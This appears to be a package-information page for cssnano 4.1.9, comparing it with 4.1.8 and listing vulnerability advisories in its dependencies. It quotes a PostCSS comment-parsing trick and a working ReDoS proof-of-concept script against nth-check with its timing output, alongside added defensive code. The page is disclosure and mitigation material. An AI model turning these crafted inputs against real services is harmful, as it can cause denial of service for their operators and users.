Cssnano, a modular CSS minifier built upon the PostCSS ecosystem, saw a release of version 4.1.9 following the previous stable version 4.1.8. Developers considering upgrading should note the key differences. The primary change lies in updated dependencies. Version 4.1.9 incorporates a newer version of cssnano-preset-default, moving from 4.0.6 to 4.0.7. This preset is crucial as it defines the default set of optimizations applied during minification. Therefore, upgrading could subtly alter the final compressed CSS output.
Furthermore, there is a change in the development dependencies. cssnano-preset-advanced is updated in version 4.1.9, jumping from 4.0.2 to 4.0.7. While this primarily affects the development environment used for building and testing cssnano itself, it indirectly impacts developers who contribute to the project or rely on developer tools integrated with cssnano. The updated advanced preset might introduce different or more refined optimization strategies used during development. Also, the unpacked size increased slightly, from 28053 to 29457, which may be worth monitoring if you are sensitive to the size of the library.
Both versions depend on core libraries like postcss, cosmiconfig, and is-resolvable using the same version constraints. This ensures a consistently supported PostCSS environment. The core functionalities and developer experience remain largely unaffected, making the upgrade relatively smooth. Ultimately, the upgrade from 4.1.8 to 4.1.9 is a minor one, primarily focused on preset updates that could influence minification behavior. Developers should test their CSS after upgrading to verify desired output.
All the vulnerabilities related to version 4.1.9 of the package
PostCSS line return parsing error
An issue was discovered in PostCSS before 8.4.31. It affects linters using PostCSS to parse external Cascading Style Sheets (CSS). There may be \r discrepancies, as demonstrated by @font-face{ font:(\r/*);} in a rule.
This vulnerability affects linters using PostCSS to parse external untrusted CSS. An attacker can prepare CSS in such a way that it contains parts parsed by PostCSS as a CSS comment. After processing by PostCSS, those parts are included in the PostCSS output as CSS nodes (rules, properties) despite originally being inside a comment.
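The two practical defences against the advisory above are to confirm the installed PostCSS is at or above the fixed version, and, while an older parser is still in use, to remove bare carriage returns from untrusted CSS before it is parsed so the \r discrepancy cannot arise. The following is an added example written for this page, not code from PostCSS or cssnano; the fixed-version threshold 8.4.31 and the demonstration rule come from the advisory, while the function names and the "normalize rather than reject" policy are this example's own assumptions.

```javascript
// Added example (not PostCSS or cssnano code). Assumed: plain x.y.z version
// strings, and that normalizing CR to LF is an acceptable policy for the input.

// Compare dotted version strings numerically ("8.4.9" must sort below "8.4.31",
// which a plain string comparison gets wrong). True when installed >= fixed.
function isAtLeast(installed, fixed) {
  const a = installed.split(".").map((p) => parseInt(p, 10) || 0);
  const b = fixed.split(".").map((p) => parseInt(p, 10) || 0);
  for (let i = 0; i < Math.max(a.length, b.length); i++) {
    const x = a[i] || 0;
    const y = b[i] || 0;
    if (x !== y) return x > y;
  }
  return true;
}

// Rewrite CRLF and lone CR as LF so the text handed to the parser contains no
// bare \r. Returns the rewritten CSS and how many CR sequences were replaced.
function normalizeLineEndings(css) {
  let removed = 0;
  const normalized = css.replace(/\r\n?/g, () => {
    removed++;
    return "\n";
  });
  return { css: normalized, removed };
}

// Pre-parse guard for untrusted CSS: leave the input alone when the installed
// PostCSS already carries the fix, otherwise strip the carriage returns first.
function prepareUntrustedCss(css, postcssVersion) {
  if (isAtLeast(postcssVersion, "8.4.31")) {
    return { css, removed: 0, patched: true };
  }
  const { css: normalized, removed } = normalizeLineEndings(css);
  return { css: normalized, removed, patched: false };
}

// Constructed sample: the advisory's demonstration rule with a literal CR byte.
const SAMPLE = "@font-face{ font:(\r/*);}";

// Stand-alone demonstration against an unpatched and a patched version.
console.log(prepareUntrustedCss(SAMPLE, "8.4.30"));
console.log(prepareUntrustedCss(SAMPLE, "8.4.31"));
```

Normalizing only closes the specific parsing ambiguity the advisory describes; the comment opener `/*` in the sample is still present after the rewrite, so the guard is a stop-gap for pipelines that cannot upgrade immediately, not a substitute for moving to 8.4.31 or later.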
Inefficient Regular Expression Complexity in nth-check
There is a Regular Expression Denial of Service (ReDoS) vulnerability in nth-check that causes a denial of service when parsing crafted invalid CSS nth-checks.
The ReDoS vulnerabilities of the regex are mainly due to the sub-pattern \s*(?:([+-]?)\s*(\d+))? with quantified overlapping adjacency, and can be exploited with the following code.
Proof of Concept
// PoC.js
var nthCheck = require("nth-check")
// Grow the whitespace padding by 10000 characters per iteration so the
// printed timings show the super-linear cost of the failed match.
for (var i = 1; i <= 50000; i++) {
  var time = Date.now();
  // "2n", a long run of spaces, then a "!" that can never match, which forces
  // the overlapping \s* quantifiers to backtrack over the whole run.
  var attack_str = '2n' + ' '.repeat(i * 10000) + "!";
  try {
    nthCheck.parse(attack_str)
  }
  catch (err) {
    // parse() throws on the invalid input; report how long the rejection took.
    var time_cost = Date.now() - time;
    console.log("attack_str.length: " + attack_str.length + ": " + time_cost + " ms")
  }
}
The Output
attack_str.length: 10003: 174 ms
attack_str.length: 20003: 1427 ms
attack_str.length: 30003: 2602 ms
attack_str.length: 40003: 4378 ms
attack_str.length: 50003: 7473 ms
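The timings above grow much faster than the input because the regex has to backtrack over the whitespace run before it can reject the trailing "!". A hand-written parser for the same an+b grammar avoids the problem entirely: every loop advances the read position once per character, so a long run of whitespace before an invalid tail is rejected in a single pass, and an input length cap adds a second, independent limit. The following is an added example written for this page, not nth-check's own code; the function names, the default 256-character cap and the constructed attack input are this example's assumptions.

```javascript
// Added example (not nth-check code): backtracking-free parser for CSS an+b
// formulas. Assumed: the default length cap of 256 and the helper names below.

function isDigit(ch) {
  return ch >= "0" && ch <= "9";
}

function isSpace(ch) {
  return ch === " " || ch === "\t" || ch === "\n" || ch === "\r" || ch === "\f";
}

// Parse "an+b" forms ("2n+1", "-n+3", "n", "5", "odd", "even") into [a, b].
// Each loop below moves `i` forward on every iteration, so the work is linear
// in the length of the input no matter where the invalid character sits.
function parseNth(formula, maxLength = 256) {
  if (typeof formula !== "string") throw new TypeError("formula must be a string");
  if (formula.length > maxLength) {
    throw new RangeError(`formula longer than ${maxLength} characters`);
  }
  const s = formula.trim().toLowerCase();
  if (s === "odd") return [2, 1];
  if (s === "even") return [2, 0];

  let i = 0;
  const skipSpace = () => { while (i < s.length && isSpace(s[i])) i++; };
  const readSign = () => {
    if (s[i] === "+") { i++; return 1; }
    if (s[i] === "-") { i++; return -1; }
    return 0;
  };
  const readInt = () => {
    const start = i;
    while (i < s.length && isDigit(s[i])) i++;
    return i > start ? Number(s.slice(start, i)) : null;
  };
  const fail = () => {
    throw new SyntaxError(`invalid nth formula at offset ${i}: ${JSON.stringify(formula)}`);
  };

  const sign = readSign() || 1;
  const lead = readInt();
  let a;
  let b;
  if (s[i] === "n") {
    i++;
    a = sign * (lead === null ? 1 : lead);
    skipSpace();
    if (i < s.length) {
      const bSign = readSign();
      if (bSign === 0) fail();
      skipSpace();
      const bNum = readInt();
      if (bNum === null) fail();
      b = bSign * bNum;
    } else {
      b = 0;
    }
  } else {
    if (lead === null) fail();
    a = 0;
    b = sign * lead;
  }
  skipSpace();
  if (i !== s.length) fail();
  return [a, b];
}

// Time one parse; returns the result or the thrown error's name, plus elapsed ms.
function timeParse(formula, maxLength = 256) {
  const start = process.hrtime.bigint();
  let result = null;
  let error = null;
  try {
    result = parseNth(formula, maxLength);
  } catch (e) {
    error = e.name;
  }
  const ms = Number(process.hrtime.bigint() - start) / 1e6;
  return { result, error, ms };
}

// Constructed attack input shaped like the PoC above: "2n", 100000 spaces, "!".
const ATTACK = "2n" + " ".repeat(100000) + "!";

// Stand-alone demonstration: the cap rejects it outright, and with the cap
// lifted the linear scan still rejects it in a few milliseconds at most.
console.log(timeParse(ATTACK));
console.log(timeParse(ATTACK, Infinity));
```

The cap is the cheap defence and should stay on for untrusted selectors; lifting it in the second call only shows that the parser's running time, unlike the regex's, does not depend on backtracking.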